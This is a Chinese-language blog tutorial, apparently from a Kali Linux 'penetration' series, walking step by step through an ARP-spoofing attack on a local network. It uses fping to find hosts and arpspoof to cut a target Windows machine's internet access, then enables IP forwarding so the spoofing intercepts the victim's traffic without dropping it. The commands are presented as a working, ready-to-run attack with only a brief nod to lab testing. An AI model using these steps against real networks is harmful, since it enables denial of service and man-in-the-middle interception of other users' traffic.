跳到正文

【KaliLinux渗透实战】使用ARPSpoof命令实现局域网断网攻击

arp命令的使用:Arpspoof断网: -i 网卡 -t 目标ip 网关 1.使用ifconfig命令查看kal系统的IP地址情况 686 2.使用IPconfig命令查看Windows操作系统的网卡情况,这个也就是本次需要进行局域网断网攻击的IP地址 687 IPv4 地址 . . . . . . . . . . . . : 192.168.1.100 子网掩码 . . . . . . . . . . . . : 255.255.255.240 688 默认网关. . . . . . . . . . . . . : 192.168.1.1 3.如果不知道对方IP的话怎么办?可以使用如下命令进行扫描IP: Fping -asg 192.168.1.1/24 注意第三位的值是和你所在网络环境下的IP相应值是一样的哈! 689 我们扫描到以下几个IP地址: 192.168.1.1 192.168.1.100 (目标计算机) 1992.168.1.101 4.我们先来测试一下当前目标计算机能不能上网 690 打开百度首页正常,也可以进行正常搜索,一切网络环境正常。 5.开始实现断网攻击,输入目标命令,具体如下, 691 实现:arpspoof -i etho -t 192.168.1.100 192.168.1.1 6.我们再来看下目标计算机能不能正常上网,目标计算机已经不能正常上网了,断网攻击成功! 692 693 【Arp欺骗和断网的内部黑科技原理】: 原理:目标的IP会经过我的网卡, 然后从网卡出去 【ARP欺骗成功要点】 先看下这个设置对不对,如果输入这个命令之后不是1的话那就不会成功的! root@kali:~# cat /proc/sys/net/ipv4/ip_forward 1 1.需要先设置一下KaliLinux的内置参数(关键点) 让目标机器的流量从我的我网关出去: echo 1 >/proc/sys/net/ipv4/ip_forward【此处不会有回显】 此时:Arp成功欺骗,不会出现断网现象! 2. 场景回顾: arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 3.这种黑科技(黑客攻击)攻击方式只适用于局域网,可以自己搭建一个虚拟机环境进行测试,公网IP是不可以的哈! 同一个网段是指地址的网络段相同的地址 如:同个网段的话它的IP就是192.168.0.1到192.168.0.255之间. 前提是同一网段的地址子网掩码一定相同. 如:相同掩码255.255.255.0 具体的黑科技渗透(黑客技术)视频教程可以参见文章: WEB渗透实战教程【包括无线网/KaliLinux系列教程】 http://www.52tech.tech/forum.php?mod=viewthread&tid=41&fromuid=1 (出处: 我爱科技论坛)

评论

填写昵称与邮箱即可评论,无需登录。

推荐阅读